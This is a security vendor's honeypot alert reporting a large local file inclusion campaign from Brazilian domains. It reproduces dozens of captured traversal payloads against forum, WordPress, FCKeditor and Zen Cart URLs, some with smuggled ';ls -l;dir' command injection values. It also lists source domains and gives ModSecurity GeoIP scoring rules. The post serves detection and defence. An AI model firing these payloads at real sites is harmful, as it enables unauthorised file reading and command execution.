[Honeypot Alert] Large Scale LFI Attack From Brazillian Domains
6 Minute Read
by Ryan Barnett
Our web sensors picked up a big uptick in Local File Inclusion (LFI) attacks today. We received 3675 attacks that targeted a wide range of applications all attempting to use directory traversals to access:
- Windowswin.ini
- boot.ini
Here is a sampling of attack payloads:
GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /sites/all/libraries/fckeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html?btnUndo=Undo&misword=1&sugg=&txtsugg=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /wp-trackback.php?p=..........................................Windowswin.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET /forum.php?mod=viewthread&tid=..........................................Windowswin.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=site_map&zenid=/boot.ini%00GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=featured_products&zenid=/boot.ini%00GET /index.php?main_page=product_info&products_id=638&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=product_info&products_id=638&zenid=/boot.ini%00GET /index.php?main_page=page&id=1&chapter=0&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=page&id=1&chapter=0&zenid=/boot.ini%00GET /index.php?main_page=shippinginfo&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=shippinginfo&zenid=/boot.ini%00GET /index.php?main_page=privacy&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=privacy&zenid=/boot.ini%00GET /index.php?main_page=conditions&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=conditions&zenid=/boot.ini%00GET /wp-content/plugins/download-monitor/download.php?id=..........................................Windowswin.ini%00GET /forums/viewtopic.php?f=11&t=18551&p=444445&hilit=..........................................Windowswin.ini%00GET /index.php?main_page=contact_us&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=contact_us&zenid=/boot.ini%00GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=site_map&zenid=/boot.ini%00GET /index.php?main_page=gv_faq&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=gv_faq&zenid=/boot.ini%00GET /index.php?main_page=discount_coupon&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=discount_coupon&zenid=/boot.ini%00GET /index.php?main_page=unsubscribe&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=unsubscribe&zenid=/boot.ini%00GET /index.php?main_page=reviews&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=reviews&zenid=/boot.ini%00GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=/boot.ini%00GET /index.php?main_page=specials&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=specials&zenid=/boot.ini%00GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=/boot.ini%00GET /index.php?main_page=index&manufacturers_id=303&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=index&manufacturers_id=303&zenid=/boot.ini%00GET /index.php?main_page=login&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=login&zenid=/boot.ini%00GET /index.php?main_page=index&cPath=332&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=index&cPath=332&zenid=/boot.ini%00GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=featured_products&zenid=/boot.ini%00GET /index.php?showtopic=..........................................Windowswin.ini%00GET /index.php?main_page=product_info&products_id=49354&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=product_info&products_id=49354&zenid=/boot.ini%00
We identified this attack through two methods of our commercial rules feed:
- LFI virtual patching rules
- A big increase in unique malicious IP addresses (for our IP Reputation Feed). We normally have between 500-800 IP addresses in our list per-day. Today's IP Reputation Blacklist jumped up to 2339.
After analyzing the source IP addresses, it was clear that this LFI attack campaign was orchestrated by attacker(s) in Brazil. Here is a listing of the Brazillian domains we identified:
ac.gov.br
aerotelecom.com.br
ampernet.com.br
atena.anhembi.ind.br
brma.santacasasp.org.br
cable.cabotelecom.com.br
cable.infolic.com.br
certelnet.com.br
cianetwork.com.br
claro.net.br
cpnet.com.br
customer.tdatabrasil.net.br
customer.telesp.net.br
dedicated.neoviatelecom.com.br
ded.intelignet.com.br
ded.srt.net.br
desktop.com.br
dezinternet.com.br
dial-up.telesp.net.br
din.wln.net.br
dsl.brasiltelecom.net.br
dsl.ccoce700.brasiltelecom.net.br
dsl.pmjce700.brasiltelecom.net.br
dsl.telesp.net.br
dynamic.adsl.gvt.net.br
dynamic.conectcor.com.br
dynamic.dialup.gvt.net.br
dynamic.idial.com.br
dynamic.neoviatelecom.com.br
e.brasiltelecom.net.br
e.ccoce700.brasiltelecom.net.br
e.pmjce700.brasiltelecom.net.br
fia.com.br
fw-cruz2.mma.com.br
gaccbahia.sdr.gvt.net.br
gate.futurecomp.com.br
geoposition.com.br
gw-acad-pf.upf.br
hc-gw.unicamp.br
host.gvt.net.br
http.kraftweb.com.br
ibys.com.br
i-next.psi.br
intercampo.com.br
interline.net.br
ip18.unb.org.br
ipd.brasiltelecom.net.br
ipd.brcentral.net.br
isa2.eptv.com.br
isp.timbrasil.com.br
itake.net.br
jupiter.sulpol.com.br
kratos.tdkom.psi.br
mail01.fundacaoaltinoventura.org.br
mail2.metroval.com.br
mail6.aralco.com.br
mail.aralco.com.br
mail.centraldopapel.com.br
mail.hci.ind.br
mail.nardini.ind.br
marinter.com.br
marte.ceron.com.br
mhnet.com.br
minasmaistelecom.com.br
mobile.jabursat.com.br
mx.0.rossi.com.br
neowave.com.br
nereu.vipway.net.br
nqt.com.br
ns1.vipel.ind.br
ns.argosguindastes.com.br
osprey2.certelnet.com.br
osprey.certelnet.com.br
p4net.com.br
poolip.BHE.embratel.net.br
prontonet.com.br
provale.com.br
proxy1.recife.pe.gov.br
rco.gvt.net.br
res-com.wayinternet.com.br
res-com.wayinternet.com.br
rline.com.br
sercomtel.com.br
server.smsr.com.br
servidor1.actioncentro.net.br
speedycti.com.br
srv.tecnolab.com.br
static.ctbctelecom.com.br
static.gotelecom.com.br
static.gvt.net.br
static.impsat.net.br
static.ntbr.com.br
static-pr082.redetelesul.com.br
static.spo.ctbc.com.br
static.starweb.net.br
static.stech.net.br
static-stz.convex.com.br
tcvnet.com.br
telemar.net.br
tpa.net.br
tpnet.psi.br
ufpa.br
uninetbsb.com.br
unotel.com.br
user.ajato.com.br
user.dynamic.dipelnet.com.br
user.superilinhares.com.br
user.superitelecom.com.br
user.veloxzone.com.br
user.vivozap.com.br
v4.naclick.com.br
veiculos.jelta.com.br
viacaboip.com.br
viaembratel.net.br
viafibra.com.br
virtua.com.br
wcs.net.br
web.ceralpisos.com.br
webmail.ro.senac.br
wifi.tcheturbo.com.br
wlan.lpnet.com.br
www2.ceralpisos.com.br
xd-dynamic.ctbcnetsuper.com.br
xdsl-dinamico.ctbcnetsuper.com.br
Assigning Risk Scores
If you are using ModSecurity to protect your web applications, and your user-base does not normally originate in Brazil, you may want to consider implementing some GeoIP rules to help raise the potential Threat Score.
SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.datSecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass"SecRule GEO:COUNTRY_CODE "@pm BR" "phase:1,t:none,log,pass,msg:'High Risk Source Location',setvar:tx.threat_score=+10"
This would raise the Threat Score for this transaction. You could, however, even block based solely on this information if you were sure that you have no legitimate clients from this geographic location. Simply change the "pass" action to "block".
ABOUT LEVELBLUE
LevelBlue is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.